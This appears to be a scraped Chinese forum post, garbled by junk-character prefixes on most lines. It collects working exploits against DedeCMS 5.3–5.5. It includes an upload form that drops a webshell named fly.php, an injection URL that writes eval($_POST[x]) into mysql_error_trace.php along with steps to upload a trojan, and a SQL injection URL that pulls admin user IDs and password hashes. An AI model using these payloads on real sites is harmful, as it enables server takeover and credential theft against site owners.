9 g( k8 [5 |7 Y7 x  p- w<input type='hidden' name='f' value='form1.enclosure' />
8 n4 r9 F* N' u  n; A$ Y<input type='hidden' name='job' value='upload' />
% {: P# _. m/ X6 m- k$ s<input type='hidden' name='newname' value='fly.php' />
( @7 s* Z, r  L! O- B- D8 Y9 x/ G5 ISelect U Shell <input type='file' name='uploadfile' size='25' />, ^6 ?. @# k/ f# J( p
<input type='submit' name='sb1' value='确定' />
" m! L( C% V( E5 L3 I</form>
: t; S/ O+ m) s4 l<br />It's just a exp for the bug of Dedecms V55...<br />
* g+ ]. e$ ]9 r' J1 e) B3 \$ {Need register_globals = on...<br />
( Z' M1 ?$ v4 L' Z# M, xFun the game,get a webshell at /data/cache/fly.php...<br />
$ N9 a8 e( T; ]9 O8 _% Q6 V</body>+ v5 I& s" _% X& Y7 N2 ~; C! \
</html>3 d+ c0 h  |1 {  l& q
+ Q8 g: _/ B. M2 A, `" [* H
8 ^8 v; a, |) Z8 v; X" Y* x3 T
- D+ @' M$ F' k) P) N4 f# q! t7 ]
" e9 a9 j* G! Y7 {
3 e) x4 [: h# |) e0 T: `
3 \" t2 E) o0 G) ?& P- k3 m
3 {4 D/ i3 r; M

* s! c- L! W: N4 a; v9 Y, F  o+ d5 |6 v3 [. E) R, r1 ?
  f* e2 {! t3 t! s5 }: S/ C# y6 Q2 l
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞- ^0 X, g5 ?* N+ {! D+ w$ k- n
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
% G( J3 s- b, A+ F1. 访问网址：8 M& j# ?) K( c$ C' ~% P
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>0 ?/ o" ^+ w9 ]& Z+ |3 X5 q1 w
可看见错误信息
' L* J" ^4 n, m, R
) `" n( I) s" Q8 |8 m+ t  Z/ n& c7 P$ Y$ i1 y5 \! S9 Q4 \
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
; d$ [& o3 _3 O# @0 b1 Gint(3) Error: Illegal double '1024e1024' value found during parsing) [9 ?' f4 W, U& V9 x
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>. g+ I7 y; Z9 z. e9 K

9 ?3 @. a' ]: r* o1 |6 Q
% G" x% H1 z9 e8 l9 E' G# X3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是) Y) K8 y5 t6 u- Y$ H
6 o. s& J4 Q. p' w; c
. ]) q2 [' _. G1 q
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>1 j5 B: d: r7 B+ S
- g; \) J7 @$ |: v2 @! O
" E1 }) P; l9 e8 `3 V2 {
按确定后的看到第2步骤的信息表示文件木马上传成功.4 P$ @+ A8 @  h) t$ U3 ^
$ D' S- J9 H8 i* b

: N& M: H: K! e, Y6 @; g. c$ I. ~( k: b1 O" m/ N: S
7 |0 Z: @1 b& T# P; Y- E  [
+ V3 }8 r" z1 |' [

! x+ K7 b1 B+ v, G5 w1 T7 ]) D: y4 N6 Q8 X  N3 c0 j+ ^7 C+ `
. q" p7 J) I0 c- b/ u3 h! X
' Q, \6 M4 w5 ~' s4 g0 T6 r
! g- R7 ?# ?6 H* i. w

; x/ m& ?6 R  ?1 M' X# `) x! ^3 b( c! }$ \7 ~$ [
织梦(DedeCms)plus/infosearch.php 文件注入漏洞  h- g- Q- \0 |7 n! p
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册